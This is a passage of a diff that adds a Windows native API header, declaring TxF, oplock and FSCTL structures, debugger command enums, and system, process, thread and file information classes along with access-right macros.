+ GUID TransactionId; + + // + // Transaction state, a TXFS_TRANSACTION_STATE_* value. + // + + ULONG TransactionState; + + // + // Reserved fields + // + + ULONG Reserved1; + ULONG Reserved2; + LONGLONG Reserved3; +} TXFS_LIST_TRANSACTIONS_ENTRY, *PTXFS_LIST_TRANSACTIONS_ENTRY; + +typedef struct _TXFS_LIST_TRANSACTIONS { + + // + // On output, the number of transactions involved in this RM. + // + + ULONGLONG NumberOfTransactions; + + // + // The length of the buffer required to obtain the complete list of + // transactions. Note that this value may change from call to call + // as transactions enter and exit the system. + // + + ULONGLONG BufferSizeRequired; +} TXFS_LIST_TRANSACTIONS, *PTXFS_LIST_TRANSACTIONS; + + +#if _MSC_VER >= 1200 +#pragma warning(push) +#endif +#pragma warning(disable:4201) // unnamed struct + +typedef struct _TXFS_READ_BACKUP_INFORMATION_OUT { + union { + + // + // Used to return the required buffer size if return code is STATUS_BUFFER_OVERFLOW + // + + ULONG BufferLength; + + // + // On success the data is copied here. + // + + UCHAR Buffer[1]; + } DUMMYUNIONNAME; +} TXFS_READ_BACKUP_INFORMATION_OUT, *PTXFS_READ_BACKUP_INFORMATION_OUT; + +#if _MSC_VER >= 1200 +#pragma warning(pop) +#else +#pragma warning( default : 4201 ) +#endif + +typedef struct _TXFS_WRITE_BACKUP_INFORMATION { + UCHAR Buffer[1]; +} TXFS_WRITE_BACKUP_INFORMATION, *PTXFS_WRITE_BACKUP_INFORMATION; + +#define TXFS_TRANSACTED_VERSION_NONTRANSACTED 0xFFFFFFFE +#define TXFS_TRANSACTED_VERSION_UNCOMMITTED 0xFFFFFFFF + +typedef struct _TXFS_GET_TRANSACTED_VERSION { + + // + // The version that this handle is opened to. This will be + // TXFS_TRANSACTED_VERSION_UNCOMMITTED for nontransacted and + // transactional writer handles. + // + + ULONG ThisBaseVersion; + + // + // The most recent committed version available. + // + + ULONG LatestVersion; + + // + // If this is a handle to a miniversion, the ID of the miniversion. + // If it is not a handle to a minivers, this field will be 0. + // + + USHORT ThisMiniVersion; + + // + // The first available miniversion. Unless the miniversions are + // visible to the transaction bound to this handle, this field will be zero. + // + + USHORT FirstMiniVersion; + + // + // The latest available miniversion. Unless the miniversions are + // visible to the transaction bound to this handle, this field will be zero. + // + + USHORT LatestMiniVersion; + +} TXFS_GET_TRANSACTED_VERSION, *PTXFS_GET_TRANSACTED_VERSION; + + +#define TXFS_SAVEPOINT_SET 0x00000001 + +// +// Roll back to a specified savepoint. +// + +#define TXFS_SAVEPOINT_ROLLBACK 0x00000002 + +// +// Clear (make unavailable for rollback) the most recently set savepoint +// that has not yet been cleared. +// + +#define TXFS_SAVEPOINT_CLEAR 0x00000004 + +// +// Clear all savepoints from the transaction. +// + +#define TXFS_SAVEPOINT_CLEAR_ALL 0x00000010 + +typedef struct _TXFS_SAVEPOINT_INFORMATION { + HANDLE KtmTransaction; + ULONG ActionCode; + ULONG SavepointId; +} TXFS_SAVEPOINT_INFORMATION, *PTXFS_SAVEPOINT_INFORMATION; + + +typedef struct _TXFS_CREATE_MINIVERSION_INFO { + + USHORT StructureVersion; + USHORT StructureLength; + ULONG BaseVersion; + USHORT MiniVersion; +} TXFS_CREATE_MINIVERSION_INFO, *PTXFS_CREATE_MINIVERSION_INFO; + + +typedef struct _TXFS_TRANSACTION_ACTIVE_INFO { + BOOLEAN TransactionsActiveAtSnapshot; + +} TXFS_TRANSACTION_ACTIVE_INFO, *PTXFS_TRANSACTION_ACTIVE_INFO; + +#endif /* _WIN32_WINNT >= 0x0600 */ + +#if (_WIN32_WINNT >= 0x0601) + +typedef struct _BOOT_AREA_INFO { + + ULONG BootSectorCount; // the count of boot sectors present on the file system + struct { + LARGE_INTEGER Offset; + } BootSectors[2]; // variable number of boot sectors. + +} BOOT_AREA_INFO, *PBOOT_AREA_INFO; + +typedef struct _RETRIEVAL_POINTER_BASE { + + LARGE_INTEGER FileAreaOffset; // sector offset to the first allocatable unit on the filesystem +} RETRIEVAL_POINTER_BASE, *PRETRIEVAL_POINTER_BASE; + +typedef struct _FILE_FS_PERSISTENT_VOLUME_INFORMATION { + + ULONG VolumeFlags; + ULONG FlagMask; + ULONG Version; + ULONG Reserved; + +} FILE_FS_PERSISTENT_VOLUME_INFORMATION, *PFILE_FS_PERSISTENT_VOLUME_INFORMATION; + +typedef struct _FILE_SYSTEM_RECOGNITION_INFORMATION { + + CHAR FileSystem[9]; + +} FILE_SYSTEM_RECOGNITION_INFORMATION, *PFILE_SYSTEM_RECOGNITION_INFORMATION; + +#define OPLOCK_LEVEL_CACHE_READ (0x00000001) +#define OPLOCK_LEVEL_CACHE_HANDLE (0x00000002) +#define OPLOCK_LEVEL_CACHE_WRITE (0x00000004) + +#define REQUEST_OPLOCK_INPUT_FLAG_REQUEST (0x00000001) +#define REQUEST_OPLOCK_INPUT_FLAG_ACK (0x00000002) +#define REQUEST_OPLOCK_INPUT_FLAG_COMPLETE_ACK_ON_CLOSE (0x00000004) + +#define REQUEST_OPLOCK_CURRENT_VERSION 1 + +typedef struct _REQUEST_OPLOCK_INPUT_BUFFER { + + // + // This should be set to REQUEST_OPLOCK_CURRENT_VERSION. + // + + USHORT StructureVersion; + + USHORT StructureLength; + + // + // One or more OPLOCK_LEVEL_CACHE_* values to indicate the desired level of the oplock. + // + + ULONG RequestedOplockLevel; + + // + // REQUEST_OPLOCK_INPUT_FLAG_* flags. + // + + ULONG Flags; + +} REQUEST_OPLOCK_INPUT_BUFFER, *PREQUEST_OPLOCK_INPUT_BUFFER; + +#define REQUEST_OPLOCK_OUTPUT_FLAG_ACK_REQUIRED (0x00000001) +#define REQUEST_OPLOCK_OUTPUT_FLAG_MODES_PROVIDED (0x00000002) + +typedef struct _REQUEST_OPLOCK_OUTPUT_BUFFER { + + USHORT StructureVersion; + + USHORT StructureLength; + + ULONG OriginalOplockLevel; + + ULONG NewOplockLevel; + + ULONG Flags; + + ACCESS_MASK AccessMode; + + USHORT ShareMode; + +} REQUEST_OPLOCK_OUTPUT_BUFFER, *PREQUEST_OPLOCK_OUTPUT_BUFFER; + + +#define SD_GLOBAL_CHANGE_TYPE_MACHINE_SID 1 + +typedef struct _SD_CHANGE_MACHINE_SID_INPUT { + + USHORT CurrentMachineSIDOffset; + USHORT CurrentMachineSIDLength; + + USHORT NewMachineSIDOffset; + USHORT NewMachineSIDLength; + +} SD_CHANGE_MACHINE_SID_INPUT, *PSD_CHANGE_MACHINE_SID_INPUT; + +typedef struct _SD_CHANGE_MACHINE_SID_OUTPUT { + + // + // How many entries were successfully changed in the $Secure stream + // + + ULONGLONG NumSDChangedSuccess; + + // + // How many entires failed the update in the $Secure stream + // + + ULONGLONG NumSDChangedFail; + + // + // How many entires are unused in the current security stream + // + + ULONGLONG NumSDUnused; + + // + // The total number of entries processed in the $Secure stream + // + + ULONGLONG NumSDTotal; + + // + // How many entries were successfully changed in the $MFT file + // + + ULONGLONG NumMftSDChangedSuccess; + + // + // How many entries failed the update in the $MFT file + // + + ULONGLONG NumMftSDChangedFail; + + // + // Total number of entriess process in the $MFT file + // + + ULONGLONG NumMftSDTotal; + +} SD_CHANGE_MACHINE_SID_OUTPUT, *PSD_CHANGE_MACHINE_SID_OUTPUT; + +// +// Generic INPUT & OUTPUT structures for FSCTL_SD_GLOBAL_CHANGE +// + +#if _MSC_VER >= 1200 +#pragma warning(push) +#endif +#pragma warning(disable:4201) // unnamed struct + +typedef struct _SD_GLOBAL_CHANGE_INPUT +{ + // + // Input flags (none currently defined) + // + + ULONG Flags; + + // + // Specifies which type of change we are doing and pics which member + // of the below union is in use. + // + + ULONG ChangeType; + + union { + + SD_CHANGE_MACHINE_SID_INPUT SdChange; + }; + +} SD_GLOBAL_CHANGE_INPUT, *PSD_GLOBAL_CHANGE_INPUT; + +typedef struct _SD_GLOBAL_CHANGE_OUTPUT +{ + + // + // Output State Flags (none currently defined) + // + + ULONG Flags; + + // + // Specifies which below union to use + // + + ULONG ChangeType; + + union { + + SD_CHANGE_MACHINE_SID_OUTPUT SdChange; + }; + +} SD_GLOBAL_CHANGE_OUTPUT, *PSD_GLOBAL_CHANGE_OUTPUT; + +#if _MSC_VER >= 1200 +#pragma warning(pop) +#else +#pragma warning( default : 4201 ) /* nonstandard extension used : nameless struct/union */ +#endif + +// +// Flag to indicate the encrypted file is sparse +// + +#define ENCRYPTED_DATA_INFO_SPARSE_FILE 1 + +typedef struct _EXTENDED_ENCRYPTED_DATA_INFO { + + ULONG ExtendedCode; + ULONG Length; + ULONG Flags; + ULONG Reserved; + +} EXTENDED_ENCRYPTED_DATA_INFO, *PEXTENDED_ENCRYPTED_DATA_INFO; + + +typedef struct _LOOKUP_STREAM_FROM_CLUSTER_INPUT { + ULONG Flags; + ULONG NumberOfClusters; + LARGE_INTEGER Cluster[1]; +} LOOKUP_STREAM_FROM_CLUSTER_INPUT, *PLOOKUP_STREAM_FROM_CLUSTER_INPUT; + +typedef struct _LOOKUP_STREAM_FROM_CLUSTER_OUTPUT { + ULONG Offset; + ULONG NumberOfMatches; + ULONG BufferSizeRequired; +} LOOKUP_STREAM_FROM_CLUSTER_OUTPUT, *PLOOKUP_STREAM_FROM_CLUSTER_OUTPUT; + +#define LOOKUP_STREAM_FROM_CLUSTER_ENTRY_FLAG_PAGE_FILE 0x00000001 +#define LOOKUP_STREAM_FROM_CLUSTER_ENTRY_FLAG_DENY_DEFRAG_SET 0x00000002 +#define LOOKUP_STREAM_FROM_CLUSTER_ENTRY_FLAG_FS_SYSTEM_FILE 0x00000004 +#define LOOKUP_STREAM_FROM_CLUSTER_ENTRY_FLAG_TXF_SYSTEM_FILE 0x00000008 + +#define LOOKUP_STREAM_FROM_CLUSTER_ENTRY_ATTRIBUTE_MASK 0xff000000 +#define LOOKUP_STREAM_FROM_CLUSTER_ENTRY_ATTRIBUTE_DATA 0x01000000 +#define LOOKUP_STREAM_FROM_CLUSTER_ENTRY_ATTRIBUTE_INDEX 0x02000000 +#define LOOKUP_STREAM_FROM_CLUSTER_ENTRY_ATTRIBUTE_SYSTEM 0x03000000 + +typedef struct _LOOKUP_STREAM_FROM_CLUSTER_ENTRY { + ULONG OffsetToNext; + ULONG Flags; + LARGE_INTEGER Reserved; + LARGE_INTEGER Cluster; + WCHAR FileName[1]; +} LOOKUP_STREAM_FROM_CLUSTER_ENTRY, *PLOOKUP_STREAM_FROM_CLUSTER_ENTRY; + +typedef struct _FILE_TYPE_NOTIFICATION_INPUT { + + ULONG Flags; + ULONG NumFileTypeIDs; + GUID FileTypeID[1]; + +} FILE_TYPE_NOTIFICATION_INPUT, *PFILE_TYPE_NOTIFICATION_INPUT; + +#define FILE_TYPE_NOTIFICATION_FLAG_USAGE_BEGIN 0x00000001 //Set when adding the specified usage on the given file +#define FILE_TYPE_NOTIFICATION_FLAG_USAGE_END 0x00000002 //Set when removing the specified usage on the given file + +DEFINE_GUID( FILE_TYPE_NOTIFICATION_GUID_PAGE_FILE, 0x0d0a64a1, 0x38fc, 0x4db8, 0x9f, 0xe7, 0x3f, 0x43, 0x52, 0xcd, 0x7c, 0x5c ); +DEFINE_GUID( FILE_TYPE_NOTIFICATION_GUID_HIBERNATION_FILE, 0xb7624d64, 0xb9a3, 0x4cf8, 0x80, 0x11, 0x5b, 0x86, 0xc9, 0x40, 0xe7, 0xb7 ); +DEFINE_GUID( FILE_TYPE_NOTIFICATION_GUID_CRASHDUMP_FILE, 0x9d453eb7, 0xd2a6, 0x4dbd, 0xa2, 0xe3, 0xfb, 0xd0, 0xed, 0x91, 0x09, 0xa9 ); +#endif /* _WIN32_WINNT >= 0x0601 */ + +#endif // _FILESYSTEMFSCTL_ + +// 21.12.2011 - end + +// 09.06.2011 - end + +typedef enum _SYSDBG_COMMAND +{ + SysDbgQueryModuleInformation, + SysDbgQueryTraceInformation, + SysDbgSetTracepoint, + SysDbgSetSpecialCall, + SysDbgClearSpecialCalls, + SysDbgQuerySpecialCalls, + SysDbgBreakPoint, + SysDbgQueryVersion, + SysDbgReadVirtual, + SysDbgWriteVirtual, + SysDbgReadPhysical, + SysDbgWritePhysical, + SysDbgReadControlSpace, + SysDbgWriteControlSpace, + SysDbgReadIoSpace, + SysDbgWriteIoSpace, + SysDbgReadMsr, + SysDbgWriteMsr, + SysDbgReadBusData, + SysDbgWriteBusData, + SysDbgCheckLowMemory, + SysDbgEnableKernelDebugger, + SysDbgDisableKernelDebugger, + SysDbgGetAutoKdEnable, + SysDbgSetAutoKdEnable, + SysDbgGetPrintBufferSize, + SysDbgSetPrintBufferSize, + SysDbgGetKdUmExceptionEnable, + SysDbgSetKdUmExceptionEnable, + SysDbgGetTriageDump, + SysDbgGetKdBlockEnable, + SysDbgSetKdBlockEnable, + SysDbgRegisterForUmBreakInfo, + SysDbgGetUmBreakPid, + SysDbgClearUmBreakPid, + SysDbgGetUmAttachPid, + SysDbgClearUmAttachPid +} SYSDBG_COMMAND, *PSYSDBG_COMMAND; + +typedef struct _SYSDBG_VIRTUAL +{ + PVOID Address; + PVOID Buffer; + ULONG Request; +} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL; + +typedef struct _SYSDBG_PHYSICAL +{ + PHYSICAL_ADDRESS Address; + PVOID Buffer; + ULONG Request; +} SYSDBG_PHYSICAL, *PSYSDBG_PHYSICAL; + +typedef struct _SYSDBG_CONTROL_SPACE +{ + ULONG64 Address; + PVOID Buffer; + ULONG Request; + ULONG Processor; +} SYSDBG_CONTROL_SPACE, *PSYSDBG_CONTROL_SPACE; + +typedef enum _INTERFACE_TYPE +{ + UnknownInterfaceType = 1 +} INTERFACE_TYPE ; + +typedef struct _SYSDBG_IO_SPACE +{ + ULONG64 Address; + PVOID Buffer; + ULONG Request; + enum _INTERFACE_TYPE InterfaceType; + ULONG BusNumber; + ULONG AddressSpace; +} SYSDBG_IO_SPACE, *PSYSDBG_IO_SPACE; + +typedef struct _SYSDBG_MSR +{ + ULONG Msr; + ULONG64 Data; +} SYSDBG_MSR, *PSYSDBG_MSR; + +typedef enum _BUS_DATA_TYPE +{ + ConfigurationSpaceUndefined = -1, + Cmos, + EisaConfiguration, + Pos, + CbusConfiguration, + PCIConfiguration, + VMEConfiguration, + NuBusConfiguration, + PCMCIAConfiguration, + MPIConfiguration, + MPSAConfiguration, + PNPISAConfiguration, + SgiInternalConfiguration, + MaximumBusDataType +} BUS_DATA_TYPE, *PBUS_DATA_TYPE; + +typedef struct _SYSDBG_BUS_DATA +{ + ULONG Address; + PVOID Buffer; + ULONG Request; + enum _BUS_DATA_TYPE BusDataType; + ULONG BusNumber; + ULONG SlotNumber; +} SYSDBG_BUS_DATA, *PSYSDBG_BUS_DATA; + +typedef struct _SYSDBG_TRIAGE_DUMP +{ + ULONG Flags; + ULONG BugCheckCode; + ULONG_PTR BugCheckParam1; + ULONG_PTR BugCheckParam2; + ULONG_PTR BugCheckParam3; + ULONG_PTR BugCheckParam4; + ULONG ProcessHandles; + ULONG ThreadHandles; + PHANDLE Handles; +} SYSDBG_TRIAGE_DUMP, *PSYSDBG_TRIAGE_DUMP; + +typedef enum _SYSTEM_INFORMATION_CLASS +{ + SystemBasicInformation, + SystemProcessorInformation, + SystemPerformanceInformation, + SystemTimeOfDayInformation, + SystemPathInformation, + SystemProcessInformation, + SystemCallCountInformation, + SystemDeviceInformation, + SystemProcessorPerformanceInformation, + SystemFlagsInformation, + SystemCallTimeInformation, + SystemModuleInformation, + SystemLocksInformation, + SystemStackTraceInformation, + SystemPagedPoolInformation, + SystemNonPagedPoolInformation, + SystemHandleInformation, + SystemObjectInformation, + SystemPageFileInformation, + SystemVdmInstemulInformation, + SystemVdmBopInformation, + SystemFileCacheInformation, + SystemPoolTagInformation, + SystemInterruptInformation, + SystemDpcBehaviorInformation, + SystemFullMemoryInformation, + SystemLoadGdiDriverInformation, + SystemUnloadGdiDriverInformation, + SystemTimeAdjustmentInformation, + SystemSummaryMemoryInformation, + SystemMirrorMemoryInformation, + SystemPerformanceTraceInformation, + SystemObsolete0, + SystemExceptionInformation, + SystemCrashDumpStateInformation, + SystemKernelDebuggerInformation, + SystemContextSwitchInformation, + SystemRegistryQuotaInformation, + SystemExtendServiceTableInformation, + SystemPrioritySeperation, + SystemVerifierAddDriverInformation, + SystemVerifierRemoveDriverInformation, + SystemProcessorIdleInformation, + SystemLegacyDriverInformation, + SystemCurrentTimeZoneInformation, + SystemLookasideInformation, + SystemTimeSlipNotification, + SystemSessionCreate, + SystemSessionDetach, + SystemSessionInformation, + SystemRangeStartInformation, + SystemVerifierInformation, + SystemVerifierThunkExtend, + SystemSessionProcessInformation, + SystemLoadGdiDriverInSystemSpace, + SystemNumaProcessorMap, + SystemPrefetcherInformation, + SystemExtendedProcessInformation, + SystemRecommendedSharedDataAlignment, + SystemComPlusPackage, + SystemNumaAvailableMemory, + SystemProcessorPowerInformation, + SystemEmulationBasicInformation, // WOW64 + SystemEmulationProcessorInformation, // WOW64 + SystemExtendedHandleInformation, + SystemLostDelayedWriteInformation, + SystemBigPoolInformation, + SystemSessionPoolTagInformation, + SystemSessionMappedViewInformation, + SystemHotpatchInformation, + SystemObjectSecurityMode, + SystemWatchdogTimerHandler, + SystemWatchdogTimerInformation, + SystemLogicalProcessorInformation, + SystemWow64SharedInformation, + SystemRegisterFirmwareTableInformationHandler, + SystemFirmwareTableInformation, + SystemModuleInformationEx, + SystemVerifierTriageInformation, + SystemSuperfetchInformation, + SystemMemoryListInformation, + SystemFileCacheInformationEx, + SystemThreadPriorityClientIdInformation, + SystemProcessorIdleCycleTimeInformation, + SystemVerifierCancellationInformation, + SystemProcessorPowerInformationEx, + SystemRefTraceInformation, + SystemSpecialPoolInformation, + SystemProcessIdInformation, + SystemErrorPortInformation, + SystemBootEnvironmentInformation, + SystemHypervisorInformation, + SystemVerifierInformationEx, + SystemTimeZoneInformation, + SystemImageFileExecutionOptionsInformation, + SystemCoverageInformation, + SystemPrefetchPatchInformation, + SystemVerifierFaultsInformation, + SystemSystemPartitionInformation, + SystemSystemDiskInformation, + SystemProcessorPerformanceDistribution, + SystemNumaProximityNodeInformation, + SystemDynamicTimeZoneInformation, + SystemCodeIntegrityInformation, + SystemProcessorMicrocodeUpdateInformation, + SystemProcessorBrandString, + SystemVirtualAddressInformation, + MaxSystemInfoClass +} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; + +typedef enum _EVENT_TRACE_INFORMATION_CLASS +{ + EventTraceKernelVersionInformation, + EventTraceGroupMaskInformation, + EventTracePerformanceInformation, + EventTraceTimeProfileInformation, + EventTraceSessionSecurityInformation, + MaxEventTraceInfoClass +} EVENT_TRACE_INFORMATION_CLASS, *PEVENT_TRACE_INFORMATION_CLASS; + +#define LOCK_QUEUE_WAIT 1 +#define LOCK_QUEUE_WAIT_BIT 0 + +#define LOCK_QUEUE_OWNER 2 +#define LOCK_QUEUE_OWNER_BIT 1 + +#define LOCK_QUEUE_TIMER_LOCK_SHIFT 4 +#define LOCK_QUEUE_TIMER_TABLE_LOCKS (1 << (8 - LOCK_QUEUE_TIMER_LOCK_SHIFT)) + +typedef enum _KSPIN_LOCK_QUEUE_NUMBER { + LockQueueDispatcherLock, + LockQueueUnusedSpare1, + LockQueuePfnLock, + LockQueueSystemSpaceLock, + LockQueueVacbLock, + LockQueueMasterLock, + LockQueueNonPagedPoolLock, + LockQueueIoCancelLock, + LockQueueWorkQueueLock, + LockQueueIoVpbLock, + LockQueueIoDatabaseLock, + LockQueueIoCompletionLock, + LockQueueNtfsStructLock, + LockQueueAfdWorkQueueLock, + LockQueueBcbLock, + LockQueueMmNonPagedPoolLock, + LockQueueUnusedSpare16, + LockQueueTimerTableLock, + LockQueueMaximumLock = LockQueueTimerTableLock + LOCK_QUEUE_TIMER_TABLE_LOCKS +} KSPIN_LOCK_QUEUE_NUMBER, *PKSPIN_LOCK_QUEUE_NUMBER; + +typedef enum _KPROFILE_SOURCE { + ProfileTime, + ProfileAlignmentFixup, + ProfileTotalIssues, + ProfilePipelineDry, + ProfileLoadInstructions, + ProfilePipelineFrozen, + ProfileBranchInstructions, + ProfileTotalNonissues, + ProfileDcacheMisses, + ProfileIcacheMisses, + ProfileCacheMisses, + ProfileBranchMispredictions, + ProfileStoreInstructions, + ProfileFpInstructions, + ProfileIntegerInstructions, + Profile2Issue, + Profile3Issue, + Profile4Issue, + ProfileSpecialInstructions, + ProfileTotalCycles, + ProfileIcacheIssues, + ProfileDcacheAccesses, + ProfileMemoryBarrierCycles, + ProfileLoadLinkedIssues, + ProfileMaximum +} KPROFILE_SOURCE; + +typedef enum _PROCESSINFOCLASS +{ + ProcessBasicInformation, + ProcessQuotaLimits, + ProcessIoCounters, + ProcessVmCounters, + ProcessTimes, + ProcessBasePriority, + ProcessRaisePriority, + ProcessDebugPort, + ProcessExceptionPort, + ProcessAccessToken, + ProcessLdtInformation, + ProcessLdtSize, + ProcessDefaultHardErrorMode, + ProcessIoPortHandlers, + ProcessPooledUsageAndLimits, + ProcessWorkingSetWatch, + ProcessUserModeIOPL, + ProcessEnableAlignmentFaultFixup, + ProcessPriorityClass, + ProcessWx86Information, + ProcessHandleCount, + ProcessAffinityMask, + ProcessPriorityBoost, + ProcessDeviceMap, + ProcessSessionInformation, + ProcessForegroundInformation, + ProcessWow64Information, + ProcessImageFileName, + ProcessLUIDDeviceMapsEnabled, + ProcessBreakOnTermination, + ProcessDebugObjectHandle, + ProcessDebugFlags, + ProcessHandleTracing, + ProcessIoPriority, + ProcessExecuteFlags, + ProcessTlsInformation, + ProcessCookie, + ProcessImageInformation, + ProcessCycleTime, + ProcessPagePriority, + ProcessInstrumentationCallback, + ProcessThreadStackAllocation, + ProcessWorkingSetWatchEx, + ProcessImageFileNameWin32, + ProcessImageFileMapping, + ProcessAffinityUpdateMode, + ProcessMemoryAllocationMode, + ProcessGroupInformation, + ProcessTokenVirtualizationEnabled, + ProcessConsoleHostProcess, + ProcessWindowInformation, + MaxProcessInfoClass +} PROCESSINFOCLASS; + +typedef enum _THREADINFOCLASS { + ThreadBasicInformation, + ThreadTimes, + ThreadPriority, + ThreadBasePriority, + ThreadAffinityMask, + ThreadImpersonationToken, + ThreadDescriptorTableEntry, + ThreadEnableAlignmentFaultFixup, + ThreadEventPair_Reusable, + ThreadQuerySetWin32StartAddress, + ThreadZeroTlsCell, + ThreadPerformanceCount, + ThreadAmILastThread, + ThreadIdealProcessor, + ThreadPriorityBoost, + ThreadSetTlsArrayAddress, // Obsolete + ThreadIsIoPending, + ThreadHideFromDebugger, + ThreadBreakOnTermination, + ThreadSwitchLegacyState, + ThreadIsTerminated, + ThreadLastSystemCall, + ThreadIoPriority, + ThreadCycleTime, + ThreadPagePriority, + ThreadActualBasePriority, + ThreadTebInformation, + ThreadCSwitchMon, // Obsolete + ThreadCSwitchPmu, + ThreadWow64Context, + ThreadGroupInformation, + ThreadUmsInformation, // UMS + ThreadCounterProfiling, + ThreadIdealProcessorEx, + MaxThreadInfoClass +} THREADINFOCLASS; + + +typedef enum _PROCESS_TLS_INFORMATION_TYPE +{ + ProcessTlsReplaceIndex, + ProcessTlsReplaceVector, + MaxProcessTlsOperation +} PROCESS_TLS_INFORMATION_TYPE; + + +#define PROCESS_TERMINATE (0x0001) +#define PROCESS_CREATE_THREAD (0x0002) +#define PROCESS_SET_SESSIONID (0x0004) +#define PROCESS_VM_OPERATION (0x0008) +#define PROCESS_VM_READ (0x0010) +#define PROCESS_VM_WRITE (0x0020) +#define PROCESS_DUP_HANDLE (0x0040) +#define PROCESS_CREATE_PROCESS (0x0080) +#define PROCESS_SET_QUOTA (0x0100) +#define PROCESS_SET_INFORMATION (0x0200) +#define PROCESS_QUERY_INFORMATION (0x0400) +#define PROCESS_SET_PORT (0x0800) +#define PROCESS_SUSPEND_RESUME (0x0800) + +#define NtCurrentThread() ( (HANDLE)(LONG_PTR) -2 ) +#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) +#define ZwCurrentProcess() NtCurrentProcess() +#define ZwCurrentThread() NtCurrentThread() + +// 28.05.2011 - rndbit +#define NtLastError() ( NtCurrentTeb()->LastErrorValue ) +#define NtLastStatus() ( NtCurrentTeb()->LastStatusValue ) + +#if defined(_M_X86) +#define NtCurrentPID() __readfsdword(0x20) +#else +#define NtCurrentPID() __readgsqword(0x20) +#endif + +#define THREAD_TERMINATE (0x0001) +#define THREAD_SUSPEND_RESUME (0x0002) +#define THREAD_ALERT (0x0004) +#define THREAD_GET_CONTEXT (0x0008) +#define THREAD_SET_CONTEXT (0x0010) +#define THREAD_SET_INFORMATION (0x0020) +#define THREAD_QUERY_INFORMATION (0x0040) +#define THREAD_SET_THREAD_TOKEN (0x0080) +#define THREAD_IMPERSONATE (0x0100) +#define THREAD_DIRECT_IMPERSONATION (0x0200) + +#define JOB_OBJECT_ASSIGN_PROCESS (0x0001) +#define JOB_OBJECT_SET_ATTRIBUTES (0x0002) +#define JOB_OBJECT_QUERY (0x0004) +#define JOB_OBJECT_TERMINATE (0x0008) +#define JOB_OBJECT_SET_SECURITY_ATTRIBUTES (0x0010) +#ifndef _WINNT_ +#define JOB_OBJECT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1F ) +#endif + +#define PEB_STDIO_HANDLE_NATIVE 0 +#define PEB_STDIO_HANDLE_SUBSYS 1 +#define PEB_STDIO_HANDLE_PM 2 +#define PEB_STDIO_HANDLE_RESERVED 3 + +#define GDI_HANDLE_BUFFER_SIZE32 34 +#define GDI_HANDLE_BUFFER_SIZE64 60 + +#if !defined(_M_X64) +#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32 +#else +#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64 +#endif + +typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32]; +typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64]; +typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE]; + +#define FOREGROUND_BASE_PRIORITY 9 +#define NORMAL_BASE_PRIORITY 8 + +#ifndef FILE_READ_ACCESS +#define FILE_READ_ACCESS ( 0x0001 ) +#endif + +typedef enum _FILE_INFORMATION_CLASS +{ + FileDirectoryInformation = 1, + FileFullDirectoryInformation, + FileBothDirectoryInformation, + FileBasicInformation, + FileStandardInformation, + FileInternalInformation, + FileEaInformation, + FileAccessInformation, + FileNameInformation, + FileRenameInformation, + FileLinkInformation, + FileNamesInformation, + FileDispositionInformation, + FilePositionInformation, + FileFullEaInformation, + FileModeInformation, + FileAlignmentInformation, + FileAllInformation, + FileAllocationInformation, + FileEndOfFileInformation, + FileAlternateNameInformation, + FileStreamInformation, + FilePipeInformation, + FilePipeLocalInformation, + FilePipeRemoteInformation, + FileMailslotQueryInformation, + FileMailslotSetInformation, + FileCompressionInformation, + FileObjectIdInformation, + FileCompletionInformation, + FileMoveClusterInformation, + FileQuotaInformation, + FileReparsePointInformation, + FileNetworkOpenInformation, + FileAttributeTagInformation, + FileTrackingInformation, + FileIdBothDirectoryInformation, + FileIdFullDirectoryInformation, + FileValidDataLengthInformation, + FileShortNameInformation, + FileIoCompletionNotificationInformation, + FileIoStatusBlockRangeInformation, + FileIoPriorityHintInformation, + FileSfioReserveInformation, + FileSfioVolumeInformation, + FileHardLinkInformation, + FileProcessIdsUsingFileInformation, + FileNormalizedNameInformation, + FileNetworkPhysicalNameInformation, + FileIdGlobalTxDirectoryInformation, + FileMaximumInformation +} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS; + +typedef enum _FSINFOCLASS { + FileFsVolumeInformation = 1, + FileFsLabelInformation, + FileFsSizeInformation, + FileFsDeviceInformation, + FileFsAttributeInformation, + FileFsControlInformation, + FileFsFullSizeInformation, + FileFsObjectIdInformation, + FileFsDriverPathInformation, + FileFsVolumeFlagsInformation, + FileFsMaximumInformation +} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS; + +typedef enum _POOL_TYPE { + NonPagedPool, + PagedPool, + NonPagedPoolMustSucceed, + DontUseThisType, + NonPagedPoolCacheAligned, + PagedPoolCacheAligned, + NonPagedPoolCacheAlignedMustS, + MaxPoolType, + NonPagedPoolSession, + PagedPoolSession, + NonPagedPoolMustSucceedSession, + DontUseThisTypeSession, + NonPagedPoolCacheAlignedSession, + PagedPoolCacheAlignedSession, + NonPagedPoolCacheAlignedMustSSession +} POOL_TYPE, *PPOOL_TYPE; + +typedef enum _MEMORY_INFORMATION_CLASS +{ + MemoryBasicInformation, + MemoryWorkingSetInformation, + MemoryMappedFilenameInformation, + MemoryRegionInformation, + MemoryWorkingSetExInformation +} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS; + +typedef enum _REG_NOTIFY_CLASS +{ + RegNtDeleteKey, + RegNtPreDeleteKey, + RegNtSetValueKey, + RegNtPreSetValueKey, + RegNtDeleteValueKey, + RegNtPreDeleteValueKey, + RegNtSetInformationKey, + RegNtPreSetInformationKey, + RegNtRenameKey, + RegNtPreRenameKey, + RegNtEnumerateKey, + RegNtPreEnumerateKey, + RegNtEnumerateValueKey, + RegNtPreEnumerateValueKey, + RegNtQueryKey, + RegNtPreQueryKey, + RegNtQueryValueKey, + RegNtPreQueryValueKey, + RegNtQueryMultipleValueKey, + RegNtPreQueryMultipleValueKey, + RegNtPreCreateKey, + RegNtPostCreateKey, + RegNtPreOpenKey, + RegNtPostOpenKey, + RegNtKeyHandleClose, + RegNtPreKeyHandleClose, + RegNtPostDeleteKey, + RegNtPostSetValueKey, + RegNtPostDeleteValueKey, + RegNtPostSetInformationKey, + RegNtPostRenameKey, + RegNtPostEnumerateKey, + 